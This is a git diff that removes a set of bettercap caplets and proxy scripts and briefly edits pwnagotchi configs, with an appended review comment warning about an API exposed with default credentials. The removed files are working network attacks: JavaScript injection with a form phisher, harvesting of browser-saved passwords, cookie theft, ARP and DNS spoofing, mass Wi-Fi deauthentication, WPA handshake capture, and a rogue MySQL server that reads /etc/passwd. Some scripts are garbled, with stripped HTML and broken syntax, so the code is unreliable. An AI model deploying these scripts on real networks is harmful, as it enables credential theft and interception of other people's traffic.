+++ /dev/null
@@ -1,25 +0,0 @@
-### JS-INJECT
-
-A simple yet powerful proxy module that lets you inject your JavaScript payloads into any HTTP web page/application.
-
-It prevents re-initiation of your script when it's already active in the DOM by declaring your payload as a unique function variable, and in some cases ignores the `X-Content-Type-Options: nosniff` header by checking for both `Content-Type` headers and file extensions.
-
-All you have to do is set your payload path in the caplet file.
-
-**jsinject/jsinject.cap**
-
-```sh
-# Set the path to your JavaScript payload
-set jsinject.payload jsinject/payloads/form-phisher.js
-
-set http.proxy.script jsinject/jsinject.js
-set net.sniff.verbose false
-net.sniff on
-http.proxy on
-```
-
-
-
-### Included payload
-
-
form-phisher.js is included, which will wait for the victim to press a key before binding to the enter key, mouse click, screen tap and submit events in order to phish all the fields. This can be useful when you want to sniff proxied forms that are submitted over HTTPS, don't use URL parameters, etc.
diff --git a/jsinject/jsinject.cap b/jsinject/jsinject.cap
deleted file mode 100644
index 98f7dfd..0000000
--- a/jsinject/jsinject.cap
+++ /dev/null
@@ -1,8 +0,0 @@
-# Set the path to your JavaScript payload
-set jsinject.payload jsinject/payloads/form-phisher.js
-
-set http.proxy.script jsinject/jsinject.js
-set net.sniff.verbose false
-net.sniff on
-http.proxy on
-#arp.spoof on
diff --git a/jsinject/jsinject.js b/jsinject/jsinject.js
deleted file mode 100644
index 3fc2325..0000000
--- a/jsinject/jsinject.js
+++ /dev/null
@@ -1,51 +0,0 @@
-var session_id,
- payload,
- payload_path,
- payload_container = "" +
- "if (!self.{{session_id}}) {\n" +
- "var {{session_id}} = function() {\n" +
- "{{payload}}\n" +
- "}\n" +
- "{{session_id}}();\n" +
- "}\n"
-
-var green = "\033[32m",
- bold = "\033[1;37m",
- reset = "\033[0m"
-
-function randomString(length) {
- var chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz",
- buffer = ""
- while (buffer.length < length) {
- index = parseInt( Math.random() * chars.length )
- buffer = buffer + chars.charAt(index)
- }
- return buffer
-}
-
-function configure() {
- payload_path = env["jsinject.payload"].replace(/\s/g, "")
- payload = readFile(payload_path)
- payload = payload_container.replace("{{payload}}", payload).replace(/\{\{session_id\}\}/g, session_id)
-}
-
-function onLoad() {
- session_id = randomString( 4 + parseInt( Math.random() * 16 ) )
- configure()
- log_info(green + "jsinject" + reset + " started injecting payload " + bold + payload_path + reset + " into HTTP traffic.")
- log_info(green + "jsinject" + reset + " session ID is " + bold + session_id + reset + ".")
-}
-
-function onResponse(req, res) {
- configure()
- if ( res.ContentType.match(/^text\/html/i) || req.Path.replace(/\?.*/, "").match(/\.(htm|html)$/i) ) {
- res.ReadBody()
- log_debug("(" + green + "jsinject" + reset + ") attempting to inject HTML document from " + bold + req.Hostname + reset + " ...")
- res.Body = res.Body.replace(//i, "")
- }
- if ( res.ContentType.match(/^text\/javascript/i) || res.ContentType.match(/^application\/javascript/i) || req.Path.replace(/\?.*/, "").match(/\.js$/i) ) {
- res.ReadBody()
- log_debug("(" + green + "jsinject" + reset + ") attempting to inject JS document from " + bold + req.Hostname + reset + " ...")
- res.Body = payload + res.Body
- }
-}
diff --git a/jsinject/payloads/form-phisher.js b/jsinject/payloads/form-phisher.js
deleted file mode 100644
index 43b24c9..0000000
--- a/jsinject/payloads/form-phisher.js
+++ /dev/null
@@ -1,35 +0,0 @@
-var hooked = false
-
-function callback() {
- var inputs = document.getElementsByTagName("input"),
- textareas = document.getElementsByTagName("textarea"),
- params = ""
- for (var i = 0; i < inputs.length; i++) {
- if (inputs[i].value != "") {
- params = params + inputs[i].name + "=" + inputs[i].value + ( i < (inputs.length-1) ? "&" : "" )
- }
- }
- for (var i = 0; i < textareas.length; i++) {
- if (textareas[i].value != "") {
- params = params + textareas[i].name + "=" + textareas[i].value + ( i < (textareas.length-1) ? "&" : "" )
- }
- }
- if (params.length > 0) {
- req = new XMLHttpRequest()
- req.open("POST", "http://" + location.host + "/bettercap_sniffer_callback?" + params, true)
- req.send()
- }
-}
-
-self.addEventListener("keydown", function(event) {
- (event.key == "Enter" || event.keyCode == 13) ? callback() : ""
- if (hooked == false) {
- self.addEventListener("click", callback)
- self.addEventListener("touchend", callback)
- forms = document.querySelectorAll("form")
- for (var i = 0; i < forms.length; i++) {
- forms[i].addEventListener("submit", callback)
- }
- hooked = true
- }
-})
diff --git a/local-sniffer.cap b/local-sniffer.cap
deleted file mode 100644
index c9c82b1..0000000
--- a/local-sniffer.cap
+++ /dev/null
@@ -1,11 +0,0 @@
-#events.stream off
-events.clear
-# set events.stream.filter net.sniff
-# events.stream on
-
-set net.sniff.verbose false
-set net.sniff.local true
-# https://biot.com/capstats/bpf.html
-# set net.sniff.filter not arp and not udp port 53
-
-net.sniff on
diff --git a/login-manager-abuse/login-man-abuse.cap b/login-manager-abuse/login-man-abuse.cap
deleted file mode 100644
index cf1bb78..0000000
--- a/login-manager-abuse/login-man-abuse.cap
+++ /dev/null
@@ -1,12 +0,0 @@
-# targeting the whole subnet by default, to make it selective:
-#
-# sudo ./bettercap -caplet login-man-abuse.cap -eval "set arp.spoof.targets 192.168.1.53"
-
-set http.proxy.script login-man-abuse.js
-http.proxy on
-sleep 1
-arp.spoof on
-
-
-
-
diff --git a/login-manager-abuse/login-man-abuse.js b/login-manager-abuse/login-man-abuse.js
deleted file mode 100644
index a9c0b89..0000000
--- a/login-manager-abuse/login-man-abuse.js
+++ /dev/null
@@ -1,51 +0,0 @@
-/*
- * Ref.
- * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72
- * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
- *
- * The idea:
- *
- * - On every html page, inject this invisible form who grabs credentials from login managers.
- * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, we'll intercept this request.
- * - Intercept request, dump credentials, drop client to 404.
- */
-var AbuserJavascript = "";
-
-function onLoad() {
- // log( "Loading abuser code from login-man-abuser.js" );
- AbuserJavascript = readFile("/usr/local/share/bettercap/caplets/login-manager-abuse/login-man-abuser.js")
-}
-
-// here we intercept the ajax POST request with leaked credentials.
-function onRequest(req, res) {
- if( req.Method == 'POST' && req.Path == "/login-man-abuser" ) {
- log( "[LOGIN MANAGER ABUSER]\n", req.ReadBody() );
- // this was just a fake request we needed to exfiltrate
- // credentials to us, drop the connection with an empty 200.
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Connection", "close");
- res.Status = 200;
- res.ContentType = "text/html";
- res.Body = "";
- }
-}
-
-// inject the javascript in html pages
-function onResponse(req, res) {
- if( res.ContentType.indexOf('text/html') == 0 ){
- var body = res.ReadBody();
- if( body.indexOf('') != -1 ) {
- res.Body = body.replace(
- '',
- '' +
- ''
- );
- }
- }
-}
diff --git a/login-manager-abuse/login-man-abuser.js b/login-manager-abuse/login-man-abuser.js
deleted file mode 100644
index e4d329b..0000000
--- a/login-manager-abuse/login-man-abuser.js
+++ /dev/null
@@ -1,71 +0,0 @@
-/*
- * Ref.
- * - https://github.com/evilsocket/bettercap-proxy-modules/issues/72
- * - https://freedom-to-tinker.com/2017/12/27/no-boundaries-for-user-identities-web-trackers-exploit-browser-login-managers/
- *
- * The idea:
- *
- * - On every html page, inject this invisible form who grabs credentials from login managers.
- * - POST such credentials to /login-man-abuser, given we control the HTTP traffic, well intercept this request.
- * - Intercept request, dump credentials, drop client to 404.
- */
-var AbuserJavascript =
-var injectForm = function(visible) {
-var container = document.createElement("div");
-if (!visible){
-container.style.display = "none";
-}
-var form = document.createElement("form");
-form.attributes.autocomplete = "on";
-var emailInput = document.createElement("input");
-emailInput.attributes.vcard_name = "vCard.Email";
-emailInput.id = "email";
-emailInput.type = "email";
-emailInput.name = "email";
-form.appendChild(emailInput);
-var passwordInput = document.createElement("input");
-passwordInput.id = "password";
-passwordInput.type = "password";
-passwordInput.name = "password";
-form.appendChild(passwordInput);
-container.appendChild(form);
-document.body.appendChild(container);
-};
-
-var doPOST = function(data) {
-var xhr = new XMLHttpRequest();
-
-xhr.open("POST", "/login-man-abuser");
-xhr.setRequestHeader("Content-Type", "application/json");
-xhr.onload = function() {
-console.log("Enjoy your coffee!");
-};
-
-xhr.send(JSON.stringify(data));
-};
-
-var sniffInputField = function(fieldId){
-var inputElement = document.getElementById(fieldId);
-if (inputElement.value.length){
-return {fieldId: inputElement.value};
-}
-window.setTimeout(sniffInputField, 200, fieldId); // wait for 200ms
-};
-
-var sniffInputFields = function(){
-var inputs = document.getElementsByTagName("input");
-data = {};
-for (var i = 0; i < inputs.length; i++) {
-console.log("Will try to sniff element with id: " + inputs[i].id);
-output = stringsniffInputField(inputs[i].id);
-data = Object.assign({}, data, output);
-}
-doPOST(data);
-};
-
-var sniffFormInfo = function(visible) {
-injectForm(visible);
-sniffInputFields();
-};
-
-sniffFormInfo(false);;
diff --git a/mana.cap b/mana.cap
deleted file mode 100644
index 6e5e026..0000000
--- a/mana.cap
+++ /dev/null
@@ -1 +0,0 @@
-!berate_ap --no-virt --mana --mana-loud wlan1 wlan0 FreeWIFI
diff --git a/massdeauth.cap b/massdeauth.cap
deleted file mode 100644
index dc491a5..0000000
--- a/massdeauth.cap
+++ /dev/null
@@ -1,13 +0,0 @@
-set $ {by}{fw}{env.iface.name}{reset} {bold}» {reset}
-
-# every 10 seconds deauth every client from every ap
-set ticker.period 10
-set ticker.commands clear; wifi.deauth ff:ff:ff:ff:ff:ff
-
-# uncomment to only hop on these channels:
-# wifi.recon.channel 1,2,3
-
-wifi.recon on
-ticker on
-events.clear
-clear
diff --git a/mitm6.cap b/mitm6.cap
deleted file mode 100644
index 0398c87..0000000
--- a/mitm6.cap
+++ /dev/null
@@ -1,20 +0,0 @@
-# let's spoof Microsoft and Google ^_^
-set dns.spoof.domains microsoft.com, google.com
-set dhcp6.spoof.domains microsoft.com, google.com
-
-# every http request to the spoofed hosts will come to us
-# let's give em some contents
-set http.server.path www
-
-# serve files
-http.server on
-# redirect DNS request by spoofing DHCPv6 packets
-dhcp6.spoof on
-# send spoofed DNS replies ^_^
-dns.spoof on
-
-# set a custom prompt for ipv6
-set $ {by}{fw}{cidr} {fb}> {env.iface.ipv6} {reset} {bold}» {reset}
-# clear the events buffer and the screen
-events.clear
-clear
diff --git a/netmon.cap b/netmon.cap
deleted file mode 100644
index d6d2ba5..0000000
--- a/netmon.cap
+++ /dev/null
@@ -1,4 +0,0 @@
-net.recon on
-net.probe on
-clear
-ticker on
diff --git a/pita.cap b/pita.cap
deleted file mode 100644
index 237680a..0000000
--- a/pita.cap
+++ /dev/null
@@ -1,32 +0,0 @@
-# More info about this caplet: https://twitter.com/evilsocket/status/1021367629901115392
-
-set $ {bold}😈 » {reset}
-
-# make sure wlan0 is in monitor mode
-# ref: https://github.com/offensive-security/kali-arm-build-scripts/blob/master/rpi3-nexmon.sh
-!monstop
-!monstart
-
-# every 5 seconds:
-# - clear the screen
-# - show the list of nearby access points
-# - deauth every client from each one of them
-set ticker.period 5
-set ticker.commands clear; wifi.show; wifi.deauth ff:ff:ff:ff:ff:ff
-# sniff EAPOL frames ( WPA handshakes ) and save them to a pcap file.
-set net.sniff.verbose true
-set net.sniff.filter ether proto 0x888e
-set net.sniff.output wpa.pcap
-
-# uncomment to only hop on these channels:
-# wifi.recon.channel 1,2,3
-wifi.recon on
-ticker on
-net.sniff on
-
-# we'll see lots of probes after each deauth, just skip the noise ...
-events.ignore wifi.client.probe
-# start fresh
-events.clear
-clear
-
diff --git a/proxy-script-test/proxy-script-test.cap b/proxy-script-test/proxy-script-test.cap
deleted file mode 100644
index 02edc91..0000000
--- a/proxy-script-test/proxy-script-test.cap
+++ /dev/null
@@ -1,2 +0,0 @@
-set http.proxy.script proxy-script-test.js
-http.proxy on
diff --git a/proxy-script-test/proxy-script-test.js b/proxy-script-test/proxy-script-test.js
deleted file mode 100644
index b450ae6..0000000
--- a/proxy-script-test/proxy-script-test.js
+++ /dev/null
@@ -1,49 +0,0 @@
-// called when script is loaded
-function onLoad() {
- console.log( "PROXY SCRIPT LOADED" );
-}
-
-// called before a request is proxied
-function onRequest(req, res) {
- if( req.Path == "/test-page" ){
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Server", "bettercap");
- res.SetHeader("Connection", "close");
- res.Status = 200;
- res.ContentType = "text/html";
- res.Body = "" +
- "" +
- "
Test Page" +
- "" +
- "" +
- "
Hello world from bettercap!
" +
- "" +
- "";
- }
-}
-
-// called after a request is proxied and there's a response
-function onResponse(req, res) {
- if( res.Status == 404 ){
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Server", "bettercap");
- res.SetHeader("Connection", "close");
- res.ContentType = "text/html";
- res.Body = "" +
- "" +
- "
Test 404 Page" +
- "" +
- "" +
- "
Custom 404 from bettercap.
" +
- "" +
- "";
- }
-}
diff --git a/pwnagotchi-auto.cap b/pwnagotchi-auto.cap
index 1d5530e..bf19d88 100644
--- a/pwnagotchi-auto.cap
+++ b/pwnagotchi-auto.cap
@@ -1,7 +1,7 @@
# enable interface monitor mode and define wifi interface to be mon0
set wifi.interface wlan0mon
-# api listening on http://127.0.0.1:8081/ and ui to http://127.0.0.1
+# api listening on http://127.0.0.1:8081/
set api.rest.address 127.0.0.1
set api.rest.port 8081
set api.rest.username pwnagotchi
diff --git a/pwnagotchi-manual.cap b/pwnagotchi-manual.cap
index e501b38..e419418 100644
--- a/pwnagotchi-manual.cap
+++ b/pwnagotchi-manual.cap
@@ -1,16 +1,12 @@
# enable interface monitor mode and define wifi interface to be mon0
set wifi.interface wlan0mon
-# api listening on http://0.0.0.0:8081/ and ui to http://0.0.0.0
+# api listening on http://0.0.0.0:8081/
set api.rest.address 0.0.0.0
set api.rest.port 8081
-set http.server.address 0.0.0.0
-set http.server.port 80
-set http.server.path /usr/local/share/bettercap/ui
set api.rest.username pwnagotchi
set api.rest.password pwnagotchi
set api.rest.websocket true
# go!
api.rest on
-http.server on
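Review bot: After this change the caplet still exposes the REST API on every interface (`set api.rest.address 0.0.0.0`) with the fixed credentials `pwnagotchi`/`pwnagotchi` set a few lines below, and the updated comment gives the URL as plain `http://`. Removing the UI server does not shrink that exposure: anyone on a network the device joins can presumably authenticate with the published default and reach the API. I would add a comment above the address line, e.g. `# WARNING: listens on all interfaces; change api.rest.username/api.rest.password before use`, or default to `127.0.0.1` as pwnagotchi-auto.cap does and let the operator opt in to a wider bind. If remote access is intended, setting `api.rest.certificate` and `api.rest.key` would keep the credentials from crossing the network in clear text.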
diff --git a/rogue-mysql-server.cap b/rogue-mysql-server.cap
deleted file mode 100644
index 9d6efea..0000000
--- a/rogue-mysql-server.cap
+++ /dev/null
@@ -1,21 +0,0 @@
-# set the target for arp spoofing
-set arp.spoof.targets 192.168.1.236
-
-# bind rogue mysql server to localhost and
-# set the file we want to read
-set mysql.server.address 127.0.0.1
-set mysql.server.port 3306
-set mysql.server.infile /etc/passwd
-mysql.server on
-
-# set the ip from the mysql server we want to impersonate
-set tcp.address 93.184.216.34
-set tcp.port 3306
-
-# set the ip from the rogue mysql server
-set tcp.tunnel.address 127.0.0.1
-set tcp.tunnel.port 3306
-
-# go ^_^
-tcp.proxy on
-arp.spoof on
\ No newline at end of file
diff --git a/rtfm/rtfm.cap b/rtfm/rtfm.cap
deleted file mode 100644
index e5a6ab8..0000000
--- a/rtfm/rtfm.cap
+++ /dev/null
@@ -1,8 +0,0 @@
-# targeting the whole subnet by default, to make it selective:
-#
-# sudo ./bettercap -caplet rtfm.cap -eval "set arp.spoof.targets 192.168.1.64"
-
-clear
-set http.proxy.script rtfm.js
-http.proxy on
-arp.spoof on
diff --git a/rtfm/rtfm.js b/rtfm/rtfm.js
deleted file mode 100644
index 6a6c582..0000000
--- a/rtfm/rtfm.js
+++ /dev/null
@@ -1,24 +0,0 @@
-function onRequest(req, res) {
- req.Path = req.Path.replace('-you-did-not-rtfm', '');
-}
-
-function onResponse(req, res) {
- if (res.ContentType.indexOf("text/html") == 0) {
- var body = res.ReadBody();
- res.Body = body.replace(
- /\.(jpg|jpeg|png|gif|bmp)/gi,
- '-you-did-not-rtfm.$1'
- );
- }
- else if (res.ContentType.indexOf("image/jpeg") != -1) {
- headers = res.Headers.split("\r\n");
- for (var i = 0; i < headers.length; i++) {
- header_name = headers[i].replace(/:.*/, "");
- res.RemoveHeader(header_name);
- }
- res.SetHeader("Connection", "close");
- res.Status = 200;
- res.Body = readFile("/usr/local/share/bettercap/caplets/www/rtfm_cat.jpg");
- log("RTFM! " + req.Hostname + req.Path + ( req.Query ? "?" + req.Query : ''));
- }
-}
diff --git a/simple-passwords-sniffer.cap b/simple-passwords-sniffer.cap
deleted file mode 100644
index 3a207f5..0000000
--- a/simple-passwords-sniffer.cap
+++ /dev/null
@@ -1,10 +0,0 @@
-set net.sniff.regexp .*password=.+
-set net.sniff.output passwords.cap
-
-# start arp spoofing attack
-# arp.spoof on
-net.sniff on
-
-
-
-
diff --git a/steal-cookies/README.md b/steal-cookies/README.md
deleted file mode 100644
index 193d08d..0000000
--- a/steal-cookies/README.md
+++ /dev/null
@@ -1,4 +0,0 @@
-# Steal cookies
-
-Enumerate each domain from file and steal all cookies without `Secure` flag.
-
diff --git a/steal-cookies/domains.txt b/steal-cookies/domains.txt
deleted file mode 100644
index 51c5c95..0000000
--- a/steal-cookies/domains.txt
+++ /dev/null
@@ -1,10 +0,0 @@
-google.com
-youtube.com
-facebook.com
-baidu.com
-wikipedia.org
-reddit.com
-yahoo.com
-google.co.in
-qq.com
-amazon.com
\ No newline at end of file
diff --git a/steal-cookies/steal-cookies.cap b/steal-cookies/steal-cookies.cap
deleted file mode 100644
index e9513cf..0000000
--- a/steal-cookies/steal-cookies.cap
+++ /dev/null
@@ -1,3 +0,0 @@
-set steal-cookies.domains /usr/share/bettercap/caplets/steal-cookies/domains.txt
-set http.proxy.script steal-cookies.js
-http.proxy on
diff --git a/steal-cookies/steal-cookies.js b/steal-cookies/steal-cookies.js
deleted file mode 100644
index 6e358e5..0000000
--- a/steal-cookies/steal-cookies.js
+++ /dev/null
@@ -1,104 +0,0 @@
-var victims = {}
-
-function Rf(s)
-{
- return "\033[31m" + s + "\033[0m"
-}
-function Rb(s)
-{
- return "\033[41m" + s + "\033[0m"
-}
-
-function onLoad()
-{
- log( "Cookies steal module loaded." );
- log( "targets: " + env['arp.spoof.targets'] );
-}
-
-function onRequest(req, res)
-{
- var ip = req.Client.IP,
- hostname = req.Hostname,
- headers, cookies
-
- headers = req.Headers.replace(/\r\n$/g, "").split("\r\n")
- for (var i = 0; i < headers.length; i++)
- {
- header_name = headers[i].replace(/:.*/, "")
- if(header_name == 'Cookie')
- cookies = headers[i].replace(/.*?: /, "");
- }
-
- if( req.Query.indexOf('__steal') != -1 )
- {
- if(cookies)
- log( Rb( "[+] " + ip + " - " + hostname + " " + cookies ) )
-
- if( victims[ip] && victims[ip].length )
- {
- var hostname_index = victims[ip].indexOf(hostname)
- if( hostname_index != -1 )
- victims[ip].splice( hostname_index, 1 )
-
- if( victims[ip].length )
- res.Body = '\n' +
- '
\n' +
- '\n' +
- '\n' +
- ''
- else
- res.Body = 'end stealing'
- res.Status = 200
- res.ContentType = "text/html"
- res.Headers = "Connection: close"
- }
- }
-}
-
-function onResponse(req, res)
-{
- if( res.ContentType.indexOf('text/html') == 0 )
- {
- var body = res.ReadBody(),
- ip = req.Client.IP
-
- if(! victims[ip] )
- {
- victims[ip] = readFile(env["steal-cookies.domains"]).toString().split('\n')
- body = body.replace(
- '